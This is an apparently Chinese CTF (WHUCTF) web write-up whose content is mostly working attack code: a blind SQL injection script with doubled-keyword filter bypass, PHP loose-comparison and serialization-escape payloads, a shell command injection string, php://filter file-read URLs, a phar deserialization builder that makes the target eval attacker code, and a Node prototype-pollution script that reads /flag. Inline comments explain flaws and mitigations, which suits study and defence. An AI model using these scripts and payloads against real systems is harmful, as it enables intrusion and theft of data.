简单的注入，有过滤，双写绕过即可。
import requests
import time
# Boolean-based blind SQL injection helper from the writeup.
#
# Defender's reading: the login handler evidently strips SQL keywords from
# the input a single time, so a doubled keyword ("selselectect") survives
# the filter as "select" (the writeup's "双写" bypass). Keyword stripping is
# not a defence against SQL injection; parameterised queries are.
#
# The three sub-queries below were used in turn to list tables, then
# columns, then the flag column. Only `data` is referenced by the loop.
table ="(selselectect group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema regexp database())"
column="(seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='f1ag_y0u_wi1l_n3ver_kn0w')"
data = "(seselectlect group_concat(f111114g) frfromom f1ag_y0u_wi1l_n3ver_kn0w)"
url = "http://218.197.154.9:10011/login.php"
# POST body template; `user` is overwritten on every probe, `pass` is a dummy.
payload = {"user":"","pass":"2"}
x=""   # characters recovered so far
for i in range(0,1000):
    # Binary search over ASCII 33..127 for one character of the query
    # result. The only oracle is whether the response contains
    # "Login success!". (`max`, `min` and `str` shadow Python builtins.)
    max = 127
    min = 33
    while max >= min:
        mid = (max + min) // 2
        # `str` is an alias of `payload`, not a copy: the dict is mutated
        # in place each round.
        str = payload
        # The doubled "oorr" becomes OR after the server's filter; the
        # trailing "#" comments out the rest of the server-side query.
        str['user'] = 'adm\'oorr ascii(substr({},{},1))>{}#'.format(data, i, mid)
        # print(url+exp)
        r = requests.post(url,data=str)
        # print(r.text)
        if ('Login success!' in r.text):#
            min = mid + 1
        else:
            max = mid
        # The search has converged on a single code point.
        if max == mid == min:
            x += chr(mid)
            print(x)
            break
flag:
WHUCTF{r3lly_re11y_n0t_d1ffIcult_yet??~}
ezphp
<?php
// Challenge source as served. Three gates, each a PHP comparison pitfall
// rather than a real check; the writeup's bypasses are noted inline.
error_reporting(0);
highlight_file(__file__);
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];
//1st
// Gate 1 wants a value that is not exactly '23333' yet still matches
// /^23333$/. Without the D modifier, `$` also matches just before a final
// newline, so "23333\n" (the writeup's %0a) satisfies both conditions.
// Mitigation: anchor with \z (or add /D) and compare with ===.
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
echo '1st ok'."<br>";
}
else{
die('会代码审计嘛23333');
}
//2nd
// Gate 2: str1 must be numeric, the two digests must differ under the loose
// `!=`, and agree under the loose `==` after strtr(). md5() emits only
// [0-9a-f], so the 'pggnb' -> '12345' mapping never changes a digest and
// $a/$b are just $md5_1/$md5_2. The gate therefore rests entirely on PHP's
// loose string comparison, which treats digests of the form "0e<digits>"
// as numbers (the writeup's brute-force script looks for exactly those).
// Mitigation: hash_equals() or === for any digest comparison.
if(is_numeric($string_1)){
$md5_1 = md5($string_1);
$md5_2 = md5($string_2);
if($md5_1 != $md5_2){
$a = strtr($md5_1, 'pggnb', '12345');
$b = strtr($md5_2, 'pggnb', '12345');
if($a == $b){
echo '2nd ok'."<br>";
}
else{
die("can u give me the right str???");
}
}
else{
die("no!!!!!!!!");
}
}
else{
die('is str1 numeric??????');
}
//3nd
// Gate 3 helper: rewrites every "x" as "yy". Applied to serialize()'s
// output below, it lengthens string contents without updating the s:N:
// length recorded for them -- the set-up for a serialization-string
// escape, which is what the writeup's payload exploits.
// Mitigation: never transform serialized data; use JSON for untrusted input.
function filter($string){
return preg_replace('/x/', 'yy', $string);
}
// Gate 3: username is attacker-controlled, password is fixed. Because
// filter() runs after serialize(), each "x" in username grows the string by
// one byte while the s:N: length it was serialized with stays put;
// unserialize() then reads the surplus bytes as the rest of the array,
// which is how element [1] can differ from $password. The final check is a
// loose == against a string.
$username = $_POST['username'];
$password = "aaaaa";
$user = array($username, $password);
$r = filter(serialize($user));
if(unserialize($r)[1] == "123456"){
echo file_get_contents('flag.php');
}
第一层%0a,第二层脚本跑一下
<?php
// Searches, in increasing order, for integers whose md5 hex digest has the
// form "0e" followed only by digits -- a digest that PHP's loose comparison
// treats as the number zero. Prints the first two hits as "<i> <md5><br>"
// and stops. The strtr() mapping is kept for parity with the challenge
// code; md5 emits only [0-9a-f], so it never changes anything.
$hits = 0;
$candidate = 0;
while ($hits < 2 && ++$candidate <= 100000000) {
    $mapped = strtr(md5($candidate), 'pggnb', '12345');
    if (!preg_match('/^0e\d+$/', $mapped)) {
        continue;
    }
    echo $candidate . " " . md5($candidate) . "<br>";
    $hits++;
}
第三层反序列化字符串逃逸
xxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}
第三层如果不懂可以看下
ezcmd
源码:
<?php
// Vulnerable ping endpoint as served. The user-supplied `ip` is concatenated
// straight into a shell command (shell_exec below); everything before that
// is a denylist, which is the wrong shape of defence for command injection.
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
// Denylist of shell metacharacters. Because this is a PHP double-quoted
// string, "\\" becomes a single backslash in the pattern, which then
// escapes the following "|": the alternative `\\|\(` is really the literal
// text "|(", so neither a lone backslash nor a lone pipe is rejected.
// "$" and ";" are not in the list at all.
if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
// Debug leftover: a second, slightly wider pattern (\x20 instead of \x1f)
// whose 0/1 result is printed before dying.
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
// Only a literal space is rejected; shell variables such as $IFS still
// expand to whitespace (the writeup's payload).
die("no space!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
// Rejects the subsequence f..l..a..g anywhere in the argument.
die("no flag");
} else if(preg_match("/tac|rm|echo|cat|nl|less|more|tail|head/", $ip)){
// Word denylist. A backslash inside a word is removed by the shell before
// execution but is not matched here, which is why the writeup's "ca\t"
// passes.
die("cat't read flag");
}
// Command injection: `$ip` is interpolated unescaped. Mitigation: accept
// only values that pass filter_var($ip, FILTER_VALIDATE_IP) and, if a
// shell must be used at all, wrap the value with escapeshellarg().
$a = shell_exec("ping -c 4 ".$ip);
echo "<pre>";
print_r($a);
}
highlight_file(__FILE__);
?>
乍一看过滤了很多
其实和[GXYCTF2019 ping ping ping ]一题比较类似
让cat执行ls的结果
?ip=127.0.0.1;ca\t$IFS$9ls
ezinclude
脑洞题目：contact 页面中隐藏了参数 file，直接用伪协议读取即可。
thankyou.php?firstname=1&lastname=2&country=australia&subject=&file=php://filter/read=convert.base64-encode/resource=flag.php
Easy_unserialize
反序列化+phar
抓包过程中发现主页有一个 acti0n=???? 的参数，用伪协议读源码时返回了 hack，大小写绕一下就能读到源码了。
?acti0n=PhP://Filter/convert.Base64-encode/resource=view.php
拿到源码
<html lang="zh">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<link type = "text/css" rel = "stylesheet" href = "css/style.css">
</head>
<body>
<script type = "text/javascript" color = "0,0,255" opacity = '0.7' zIndex = "-2" count = "99" src = 'js/canvas-nest.min.js'></script>
#include_once "flag.php";
// NOTE(review): as pasted, the leading "#" turns the include into a comment
// and no "<?php" tag precedes it; the opening tag was presumably lost when
// the source was copied. error_reporting(0) hides every warning, including
// the ones a malformed phar or a failed unlink() would otherwise emit.
error_reporting(0);
class View
{
// Per-client upload directory, derived from REMOTE_ADDR in __construct().
public $dir;
// PHP source that __destruct() hands to eval(). It is a fixed footer here,
// but `private` gives no protection once an instance is produced by
// unserialize() -- for example from the metadata of a phar archive reached
// through a phar:// path in one of the file functions below.
private $cmd;
function __construct()
{
$this->dir = 'upload/'.md5($_SERVER['REMOTE_ADDR']).'/';
$this->cmd = 'echo "<div style=\"text-align: center;position: absolute;left: 0;bottom: 0;width: 100%;height: 30px;\">Powered by: xxx</div>";';
// 0777 leaves the upload directory world-writable.
if(!is_dir($this->dir)) {
mkdir($this->dir, 0777, true);
}
}
// Raw scandir() of the current working directory (the caller chdir()s into
// $dir before using this); the result includes "." and "..".
function get_file_list() {
$file = scandir('.');
return $file;
}
// Prints every entry except the first two ("." and ".."), numbered from 1.
function show_file_list() {
$file = $this->get_file_list();
for ($i = 2; $i < sizeof($file); $i++) {
echo "<p align=\"center\" style=\"font-weight: bold;\">[".strval($i - 1)."] $file[$i] </p>";
}
}
// Renders an <img> tag for a user-supplied file name, which is used as a
// path without any validation. getimagesize() goes through PHP's stream
// wrappers, so a phar:// path makes PHP unserialize the archive's metadata
// and any object stored in it -- the trigger the writeup uses.
// Mitigation: basename() the input, confirm it resolves inside $dir, and
// stream_wrapper_unregister('phar') if the wrapper is not needed.
function show_img($file_name) {
$name = $file_name;
// getimagesize() is called twice. For a non-image it returns false, so
// $width is null/0 and the scaling below divides by zero (silenced by
// error_reporting(0); behaviour differs between PHP versions).
$width = getimagesize($name)[0];
$height = getimagesize($name)[1];
$times = $width / 200;
$width /= $times;
$height /= $times;
$template = "<img style=\"clear: both;display: block;margin: auto;\" src=\"$this->dir$name\" alt=\"$file_name\" width = \"$width\" height = \"$height\">";
echo $template;
}
// Deletes a user-supplied path relative to the current directory. Nothing
// rejects "../" components, and file_exists() also goes through the stream
// wrappers (same phar:// concern as show_img()). "@" suppresses unlink()'s
// warning on failure.
function delete_img($file_name) {
$name = $file_name;
if (file_exists($name)) {
@unlink($name);
if(!file_exists($name)) {
echo "<p align=\"center\" style=\"font-weight: bold;\">æ••å••å• é•¤! 3s啕跳转</p>";
header("refresh:3;url=view.php");
} else {
echo "Can not delete!";
exit;
}
} else {
echo "<p align=\"center\" style=\"font-weight: bold;\">敾丕啰迕个敕件! </p>";
}
}
// Executes $cmd as PHP. This is the gadget: any View that unserialize()
// builds with an attacker-chosen $cmd runs it when the object is released.
// Mitigation: drop eval() and echo the footer directly.
function __destruct() {
eval($this->cmd);
}
}
// Entry point: build the per-client View, move into its upload directory
// and dispatch on the POST parameters. `show` and `delete` reach the methods
// unvalidated. unset($ins) runs __destruct() for this instance explicitly;
// an object unserialized from phar metadata inside show_img()/delete_img()
// is destructed earlier, as soon as it goes out of scope.
$ins = new View();
chdir($ins->dir);
echo "<h3>录啕畮录为 " . $ins->dir . "</h3>";
$ins->show_file_list();
if (isset($_POST['show'])) {
$file_name = $_POST['show'];
$ins->show_img($file_name);
}
if (isset($_POST['delete'])) {
$file_name = $_POST['delete'];
$ins->delete_img($file_name);
}
unset($ins);
</body>
</html>
很明显的phar
在show参数触发即可
<?php
// Stand-in for the target's View class with only the fields the serializer
// needs. $cmd is the string the target's __destruct() will eval() after the
// object is unserialized from the phar's metadata. Names and visibility must
// match the target class for unserialize() to populate the private field.
class View
{
public $dir;
private $cmd="show_source(\"/var/www/html/flag.php\");";
}
$a=new View();
// Intended to remove a stale archive. NOTE(review): the archive written
// below is "5.phar", so this unlink() never touches it.
@unlink("phar.phar");
$phar = new Phar("5.phar");
$phar->startBuffering();
// Stub prefixed with "GIF89a" so a magic-byte check sees a GIF; the
// __HALT_COMPILER() marker is what makes PHP treat the file as a phar.
// Defender's note: content sniffing alone does not stop this -- the fix is
// on the consuming side (path validation, disabling the phar:// wrapper).
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
// The serialized View is stored as archive metadata, which PHP unserializes
// when a file function touches the archive through phar://.
$phar->setMetadata($a);
$phar->addFromString("test.jpg", "test");
$phar->stopBuffering();
需要注意的是可能需要多包含几次
HappyGame
nodejs原型链污染,可以看官方wp
https://blog.szfszf.top/article/43/
非预期脚本:
import requests
import time
import string
import json
# Endpoint that accepts the JSON score record; its body is the only input the
# script below controls.
url = "http://218.197.154.9:10001/record"
def deco(idx, c):
    """Build the JSON body used as a one-bit oracle against the target.

    The nested ``__proto__`` keys rely on the server deep-merging the submitted
    ``score`` object, so the assignment lands on ``Object.prototype`` (the
    prototype pollution the writeup refers to). The ``_$$ND_FUNC$$_`` prefix
    looks like node-serialize's function marker, which evaluates the rest of
    the string when the polluted object is later unserialized -- confirm
    against the target's dependencies. The embedded JavaScript reads byte
    ``idx`` of ``/flag`` and throws unless it is greater than ``c``, so the
    caller learns one comparison per request from the HTTP status code.

    Args:
        idx: zero-based index into the file contents.
        c: single character to compare against.

    Returns:
        dict suitable for ``requests.post(..., json=...)``.

    Defender's notes: strip or reject ``__proto__``/``constructor``/
    ``prototype`` keys when merging user JSON (or merge into
    ``Object.create(null)``), and never unserialize user-supplied data with a
    library that can turn strings back into functions.
    """
    # Hex-escape every character so the JS survives inside the JSON string
    # and the outer template literal.
    p = ''.join(['\\x' + hex(ord(i))[2:] for i in f'if(process.mainModule.require("fs").readFileSync("/flag").toString()[{idx}]>"{c}"){{}}else{{throw Error()}}']);
    r = {"score":{"__proto__":{"__proto__":{"a":"_$$ND_FUNC$$_`.constructor.constructor(" + p + "`)()"}},"length":4}}
    return r
flag =''   # characters recovered so far
for i in range(0,1000):
    # Binary search over ASCII 32..127 for byte i of the file. A 200 response
    # means the probe did not throw ("greater than mid"); anything else means
    # it did. (`max` and `min` shadow the builtins.)
    max = 127
    min = 32
    while max >=min:
        #print(str(max)+"-------"+str(min))
        mid = (max + min) // 2
        r = requests.post(url, json=deco(i, chr(mid)))
        if r.status_code==200:
            min = mid +1
        else:
            max = mid
        # The search has converged on a single code point.
        if max == mid == min:
            flag += chr(mid)
            print(flag)
            break
    # Stop once a closing brace appears anywhere but the last position, i.e.
    # one byte after the brace has been fetched.
    if '}' in flag[:-1]:
        exit()
BookShop
ha1c9on师傅tql
@wh1sper 别骂了别骂了